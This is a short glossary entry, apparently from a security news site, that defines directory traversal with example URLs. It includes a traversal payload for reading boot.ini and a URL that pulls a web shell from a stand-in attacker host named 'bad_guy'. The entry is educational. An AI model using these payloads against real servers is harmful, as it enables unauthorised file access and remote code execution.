Directory Traversal

A directory traversal – sometimes called path traversal – is when an attacker attempts to access files outside of the main web root directory. When the server is vulnerable to directory traversal it can allow the attack broad access into server, allowing not only the ability to read the contents of files but also potentially run arbitrary commands depending on what they can access.

Basic Example

http://vulnerable_site.com/get_file.asp?file=file.pdf

If the vulnerable_site.com was impacted by directory traversal, and let’s say the attacker wanted the boot.ini file in C:\, they could then theoritically run:

http://vulnerable_site.com/get_file.asp?file=../../../../boot.ini

This becomes much more dangerous when the attacker is able to access binaries that can run code, or are from outside sources.

http://vulnerable_site.com/get_file.asp?file=http://bad_guy/webshell.asp

« Back to Glossary Index

Security news and stories right to your inbox!